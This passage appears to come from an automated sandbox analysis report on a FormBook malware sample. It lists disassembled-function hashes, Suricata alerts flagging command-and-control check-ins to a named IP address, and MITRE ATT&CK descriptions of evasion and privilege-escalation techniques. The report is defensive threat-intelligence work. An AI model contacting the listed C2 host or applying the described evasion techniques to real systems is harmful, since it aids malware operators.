Instruction Fuzzy Hash: 86F024712053519FF31896599C01F32B29AFBD8752F25802AEB0D9B2D1E970EC018394

Function 0198656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeaa296da4c814955f7c8d0a4697ac31f65ac99db1d76d34571942eb28b9a7ea
Instruction ID: ed972ae8da6821d55030d7fb8b751c1b000759832cc5d56d025feca5c5a86a10
Opcode Fuzzy Hash: aeaa296da4c814955f7c8d0a4697ac31f65ac99db1d76d34571942eb28b9a7ea
Instruction Fuzzy Hash: C401A4747006829BF323AB6CCD68F2637ACBB95B45F480594BA4D8F6D6D728D402C621

Function 019F437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: d4f41f3eb1365823a58f81c77bbb264b724f10ebee07016b13233538966e12a5
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: B1F0E93538191367EB76BA2D9A10B2BA6DDDFD0A52B05052C970DCB680EFA0D800C790

Function 019547FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a074d8b58dd96fef80e3a76c429a5525de10f9b21a38a73d108e6b01c93ddc48
Instruction ID: d833da587948958472a80dbde4539d728f7f26e0bc8619f5a39e74beafae1e4b
Opcode Fuzzy Hash: a074d8b58dd96fef80e3a76c429a5525de10f9b21a38a73d108e6b01c93ddc48
Instruction Fuzzy Hash: D8F090319166E19FE7E2CB5CC844F61BBDC9B00625F08496ADF6DA7502E724D8C0CB52

Function 01A10115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b461d6145ff28f567aa4d7a362f44cee73f25d3e47823039df9b34cb21ea0dca
Instruction ID: ec77a768a121d954a1463049ba5e1e905681f26789db1a8c6ca7c3fc991a7669
Opcode Fuzzy Hash: b461d6145ff28f567aa4d7a362f44cee73f25d3e47823039df9b34cb21ea0dca
Instruction Fuzzy Hash: 5FF0272E4167C01BCF336B2C76602D17F54A7C6214F091449D4A8A720AC5B988C3C320

Function 0198C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed77796056c0667b7391bb691d894a135369bd2031542da8c734a8d0fae39c2b
Instruction ID: a06ae45df897cbd4ac127f5a76cc7da21d10dce4d44b7b22c10e70d76a630ed7
Opcode Fuzzy Hash: ed77796056c0667b7391bb691d894a135369bd2031542da8c734a8d0fae39c2b
Instruction Fuzzy Hash: A4F0E2715116579FE322B72CC148BD5BBDCAB447AAF08983AD40E87512C664E880CA70

Function 01992619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: f898a68d1fe47573b66aba05b54b826ead1ae4769860c3f2521d5a25e99cd1c8
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: EBE092323006012BEB129F5D8C84F47776E9FD2B10F05007AB5085E251C9E29C1982A4

Function 019E6030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 76c1df3eb0a23811ef56f9c60234df7c210d08a8f4362bbf7ec5dd7ea625eba4
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: 75F03072104214AFE3229F0AD948F52BBFCEB55366F46C425E60D9B561D37AEC40CBA4

Function 01950710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: c9d52e5b099355e5e850ae800f3e398ca13132d93a51213d6b57f1d057b9948b
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 29F0ED3A2047459FEB16CF1AD450AE57BA8FB51360B080494FC4A8B341EB31EA82CB90

Function 019849D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: 3ca6dcfb79b4e2b8bbfd82bc24bc535ec84f78ec1dbf3a4f2fe631b71320e6d9
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 6AE09232244146EBD7213A598800F66B6A99FD07A1F164429E24DCF150DB70DC40C7A8

Function 01A24164 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99dfd897d99a4a8431b4d6b73601aa827d0089fe243d684a00e35bfbefdbb362
Instruction ID: 988f939029272923318b1b236677a32c1ebeecb85a53eb61a361a50a91282cd1
Opcode Fuzzy Hash: 99dfd897d99a4a8431b4d6b73601aa827d0089fe243d684a00e35bfbefdbb362
Instruction Fuzzy Hash: 1CF0ED31B26BF18FE772D72CE380B5677E4AB58A30F2A05A4D40487912C724EC80C660

Function 019F678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 3860adaf94da6818b3e04ffa075c70812672b78c4b52ff85742c37c72d0a3481
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: DFE0D832600214BBDB2197598D05F9A7EBCDB90E94F054054B704D7090D530EE00C790

Function 019525E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e2ebf5fa34d24caf53af5a6ed9600d02a0a1bc691df64452b0cce3bd4e989d0
Instruction ID: b826e34ad7e71f9b1f47b0f85a0805886cd9390f1b3a332bf584cc3fa962c3c7
Opcode Fuzzy Hash: 6e2ebf5fa34d24caf53af5a6ed9600d02a0a1bc691df64452b0cce3bd4e989d0
Instruction Fuzzy Hash: 37E02232000A80ABC322FB29CC01F8A77AAEBE0360F000125B41D57190CA30A800C798

Function 01A0A456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: e0a57d20ff471124d41511aab9523f54e80d764c32e909064d691015b765efd8
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: CEE09231010711DFEB366F2AE848B567BE4FF90711F158C2DA09E024F1C77598C0CA40

Function 019D4000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 74d6a079716163c8f4bbf6dfe69c0619af4fdb602c3d2bde54a4eb2e16e30495
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 47E0C2343003059FE715CF19C084B627BBABFD5A11F28C068A9488F605EB32E842CB40

Function 0194823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: ba1921034cae65dd777100d570dc7a69b4c0ca73d7ffc6ef367333034a690b0a
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 3EE08C32401A10EFDB322F59DC00F5176A9FB95BA1F104C2AE08E160A88674A881DA54

Function 01952050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5df21fdeeccde4bcc85ac9fcf2cb8abd0cbeabadd2b57fc7abe9d9c81fb5560b
Instruction ID: fb634cd3c9b94dc32473469be0d5b3f184e206201f96de71c2aac1268dab4d27
Opcode Fuzzy Hash: 5df21fdeeccde4bcc85ac9fcf2cb8abd0cbeabadd2b57fc7abe9d9c81fb5560b
Instruction Fuzzy Hash: 0AE0C233100590ABC312FB5DDD11F4A73AEEFE5760F100122F95897294CA24AD41C7A8

Function 0198E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: c5ce8cb4981013f35e6f0ca1e9732b81d6a304603c3e710112769329ca16a413
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: 8ED0A932614620ABD732AA1CFC00FC333EDBB88B21F06045AB04CC7054C364AC81CA94

Function 0194A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 570a9a22cbbfe5a4ff50dc58039abedddfeac606d84231fd688c53ec4a4ec0f3
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: F0D0223222B03093CB285A556800F636A09ABC1A94F0A002D780F93800C0088C42C2E0

Function 019602A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: b1c5f339428713bce54797b792f0adbce1785cad504b2fc706109ae29c6104f8
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 10D09235612A80CFD61A8B0CC5A4B5533A8BB44A45F850890E446CBB22D628D940CA10

Function 0198C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: e04d7ebb8a87ae73967d17449a48318402be6a65c629fe54dab275b23e6e3ca0
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 08C01232150644AFC7119A95CD01F0177A9E798B40F000021F60847570C535E910D654

Function 01970310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 8a049e5e4fda32720d13df2d8b8e97ab7d92a201811c4b9c5e175439fdd80207
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 35D01236100249EFCB01DF41C890D9AB72AFFD8710F148019FD19077108A31ED62DA50

Function 01950750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 939ca933886948464dba3c869c21c153fb0755470a498aa74d7160341f484ede
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 50C04C757015418FCF15DB1AD2A4F5577F8F754741F150890E909CB721E624E905DA10

Function 0040AA68 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9e79729299f8fc7e095a260c4cf8130b3311e9a0cc671e7f7b7e8e7c89ee39
Instruction ID: e2cf4a05271fe863ade9399576a451061955916bc41c7408ea901ea54a26a1d5
Opcode Fuzzy Hash: 4b9e79729299f8fc7e095a260c4cf8130b3311e9a0cc671e7f7b7e8e7c89ee39
Instruction Fuzzy Hash: BCB01254A8C7138D4085949C0C0061E11814C44624306133706319F0D3D71CC407D187

Function 01994340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d3dcad10b15cedd4fe97cda05804796d6b73921c65efec178d2d3a8faf61cc
Instruction ID: fc4d8a035ed713427e2a8fa5efa3172086ec4e2df31158b17ad1e5a38d326680
Opcode Fuzzy Hash: 91d3dcad10b15cedd4fe97cda05804796d6b73921c65efec178d2d3a8faf61cc
Instruction Fuzzy Hash: B5900271B05900129140719848985468049A7E0302B95C011E0464554CCA148A5A53A1

Function 01994650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca39f1a7a886c4b30d6b415d7b654252fd28d53cade2066afd14e23e0e6bef02
Instruction ID: 645df70e696363636452dfced04e56a2e357aa70282da6636a750bd637fc93cc
Opcode Fuzzy Hash: ca39f1a7a886c4b30d6b415d7b654252fd28d53cade2066afd14e23e0e6bef02
Instruction Fuzzy Hash: 139002A1B0160042414071984818406A049A7E13023D5C115A0594560CC618895993A9

Function 01A02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A024A6
___swprintf_l.LIBCMT ref: 01A024E2
___swprintf_l.LIBCMT ref: 01A0257D
___swprintf_l.LIBCMT ref: 01A025A3
___swprintf_l.LIBCMT ref: 01A025C8
___swprintf_l.LIBCMT ref: 01A02608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 01A024DA
:%u.%u.%u.%u, xrefs: 01A025FF
ffff:, xrefs: 01A0247D, 01A0249D
::%hs%u.%u.%u.%u, xrefs: 01A0249E

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b5c389d3347938a3be0dfbb0b565a3ca1278be796011d5f413acbfea1b6cfa7c
Instruction ID: fbc852d42ae8c59cc7cf82077202490277418d188cd8c9124e7b44a0df5dae2c
Opcode Fuzzy Hash: b5c389d3347938a3be0dfbb0b565a3ca1278be796011d5f413acbfea1b6cfa7c
Instruction Fuzzy Hash: 7C510671A00745AFDB32DF6DD894A7EBBF8EB44300B44846BE4DAD3682D675EA008760

Function 01A020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A0214F
___swprintf_l.LIBCMT ref: 01A02172

Strings

[, xrefs: 01A0212B
%%%u, xrefs: 01A02146
]:%u, xrefs: 01A02169

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 745756d6078297819b57e025f64f6ebb3eaa2cdaf3b6367c5df8a77f40649a9c
Instruction ID: 3fc74207dcbcacbb4ecb9c9e3b826f4ddc630259b6ee9fb670651c580cb2b720
Opcode Fuzzy Hash: 745756d6078297819b57e025f64f6ebb3eaa2cdaf3b6367c5df8a77f40649a9c
Instruction Fuzzy Hash: 6621657AE00319ABDB11DF79DC44AEE7BF8EF94744F440116E905D3240E730DA058BA1

Function 01A02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A0238D
___swprintf_l.LIBCMT ref: 01A023B3

Strings

]:%u, xrefs: 01A023AA
%%%u, xrefs: 01A02384

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: cdec5ab30d6683d7999b69d1f918cec8b31aacad90eb5dc410a799da052b3334
Instruction ID: 6920219b5584d9f859aa499d5ea22f58edfeeeaeb5f5e50389b0908d68c19501
Opcode Fuzzy Hash: cdec5ab30d6683d7999b69d1f918cec8b31aacad90eb5dc410a799da052b3334
Instruction Fuzzy Hash: 78318676A002199FDB21DF2DDC54BEEB7F8EB44710F44455AE949E3280EB30AA458BA1

Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 4x nop then xor eax, eax		7_2_004F9EA0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_02BC04EE

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50008 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50008 -> 134.122.133.80:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
